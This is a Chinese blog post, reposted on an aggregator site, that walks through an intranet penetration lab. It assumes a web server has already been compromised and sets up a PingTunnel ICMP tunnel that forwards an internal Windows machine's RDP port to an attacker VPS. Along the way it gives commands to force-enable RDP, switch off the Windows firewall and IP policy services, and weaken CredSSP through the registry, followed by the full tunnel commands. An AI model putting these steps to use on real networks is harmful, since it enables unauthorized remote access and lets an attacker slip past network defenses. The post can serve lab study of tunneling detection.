内网渗透ICMP隧道搭建

这篇具有很好参考价值的文章主要介绍了内网渗透ICMP隧道搭建。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

内网渗透ICMP隧道搭建

192.168.0.x模拟外网机器,1.1.1.x模拟内网机器

Linux(1.1.1.111/192.168.0.138)为WEB服务器,模拟getshell了WEB服务器的情况,通过该被控制机器将内网Windows机器(1.1.1.99)的3389远程端口映射到外网VPS(192.168.0.130)的2320端口上,黑客机器通过RDP连接192.168.0.130:2320实现远控内网Windows机器,在内网机器存在ICMP协议出网情况下即能ping通外网机器,可以搭建ICMP隧道
内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

环境检查

在搭建隧道前需要确认被攻击的内网机器可以被远程连接,以下是需要检查的一些操作

开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

关闭3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f 

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

查看注册表不是0xd3d说明3389端口被修改过

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

关闭防护墙

NetSh Advfirewall set allprofiles state off
netsh firewall set opmode mode=disable

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

IP策略和防火墙的阻拦禁用服务

 net stop sharedaccess  
 net stop policyagent

出现身份验证错误
内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

Win+R => regedit

找到路径:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
在System文件夹内创建文件夹项:\CredSSP\Parameters
在Parameters文件夹内,新建 DWORD(32)位值(D),文件名为 AllowEncryptionOracle,值为2

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

之后重新连接

使用普通用户提示需要授权
内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

普通用户3389连接不上

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

需要有权限的账号连接,使用管理员的账号

在成功远程连接后继续进行隧道搭建

隧道搭建

工具:PingTunnel
需要在WEB服务器和外网的VPS安装

安装libpcap的依赖环境

apt-get install byacc
apt-get install flex bison

安装ERROR提示检查锁文件

sudo rm /var/lib/dpkg/lock-frontend
sudo apt --fix-broken install

安装libpcap依赖库

wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
tar -xzvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure
make && make install

安装PingTunnel

wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
tar -xzvf PingTunnel-0.72.tar.gz
cd PingTunnel
make && make install

执行ptunnel报错

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

执行

locate libpcap.so.1

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

修改文件,在下面添加路径/usr/local/lib

sudo vi /etc/ld.so.conf
sudo ldconfig

在WEB服务器启动

#设置连接密码为tpa123
sudo ./ptunnel -x tpa123

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

在攻击机启动

#若机器为Linux机器可将3389端口改为22
./ptunnel -p 192.168.0.138 -lp 2320 -da 1.1.1.99 -dp 3389 -x tpa123

-p 指定ICMP隧道另一端的IP
-lp:指定本地监听的端口
-da:指定要转发的目标机器的IP
-dp:指定要转发的目标机器的端口
-x:指定连接密码

远程桌面连接192.168.0.130:2320

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全

发现远控的地址为192.168.0.130但实际控制机器的地址为1.1.1.99

内网渗透ICMP隧道搭建,从入门到入狱,服务器,后端,网络安全文章来源地址https://www.toymoban.com/news/detail-569866.html

到了这里,关于内网渗透ICMP隧道搭建的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网安全:隧道技术详解_第125天:内网安全-隧道技术&smb&icmp&正反向连接&防火墙出入规则上线

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后门执行上线 隧道技术 - SMB协议 SMB协议介绍 实战二:SMB协议搭建隧道 正向连接 - 拿下

    2024年02月22日
    浏览(46)
  • [Tools: ssh隧道] 跳板机连接内网服务器

    假设本地是A,内网跳板机是B,内网服务器是C。通常,从A连接C需要两次ssh。但通过以下ssh设置,可以简化连接过程。设置后,在终端键入ssh C,即可登录内网服务器C。 参考文档1 1. 打开终端,输入: 2. 配置pycharm 选择SFTP协议 SSH配置:主机IP为127.0.0.1,端口6000,并输入内网服

    2024年02月13日
    浏览(50)
  • 内网渗透—隧道技术

      在进行渗透测试以及攻防演练的时候,通常会存在各种边界设备、软硬件防火墙、IPS等设备来检测外部连接情况,这些设备如果发现异常,就会对通信进行阻断。   那么隧道技术就是一种绕过端口屏蔽的通信方式,在实际情况中防火墙上会设定各种安全策略,比如允许

    2024年02月08日
    浏览(51)
  • 第125天:内网安全-隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线

    知识点 演示案例 总结

    2024年02月14日
    浏览(38)
  • 第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

    知识点 演示案例

    2024年02月14日
    浏览(64)
  • 内网渗透系列:内网隧道之Neo-reGeorg

    本文研究HTTP隧道的一个工具,Neo-reGeorg github:https://github.com/L-codes/Neo-reGeorg 写于2020年,持续更新,重构版reGeorg,python写的,提高稳定性和可用性,避免特征检测 传输内容经过变形 base64 加密,伪装成 base64 编码 直接请求响应可定制化 (如伪装的404页面) HTTP Headers 的指令随机

    2024年02月05日
    浏览(51)
  • 实验篇(7.2) 08. 通过安全隧道访问内网服务器 (FortiClient-IPsec) ❀ 远程访问

    【简介】通过对SSL VPN与IPsec VPN的对比,我们知道SSL VPN是基于应用层的VPN,而IPsec VPN是基于网络层的VPN,IPsec VPN对所有的IP应用均透明。我们看看怎么用FortiClient实现IPsec VPN远程访问。    实验要求与环境 OldMei集团深圳总部部署了一台服务器,用来对所有内网的设备进行管理。

    2024年02月16日
    浏览(35)
  • 实验篇(7.2) 06. 通过安全隧道访问远端内网服务器 (FortiClient-SSL) ❀ 远程访问

    【简介】直接映射服务器到公网,没有验证不安全;通过Web浏览器访问远程内网服务器,有验证也安全,但是支持的协议太少。那有没有即安全,又能支持所有协议的访问方法呢?我们来看看SSL VPN的隧道模式。    实验要求与环境 OldMei集团深圳总部部署了域服务器和ERP服务

    2024年02月06日
    浏览(44)
  • 网络安全内网渗透之DNS隧道实验--dnscat2直连模式

    目录 一、DNS隧道攻击原理 二、DNS隧道工具 (一)安装dnscat2服务端 (二)启动服务器端 (三)在目标机器上安装客户端 (四)反弹shell         在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。入股哦在互联网上

    2024年02月06日
    浏览(48)
  • 内网搭建文件服务器

    文件下载地址 Releases · rejetto/hfs · GitHub HFS is a web file server to run on your computer. Share folders or even a single file thanks to the virtual file system. - Releases · rejetto/hfs https://github.com/rejetto/hfs/releases http://192.168.100.33/apk/ 就是你内网的文件服务器 地址  同时可以看到内网发送的请求 信息等

    2024年02月01日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包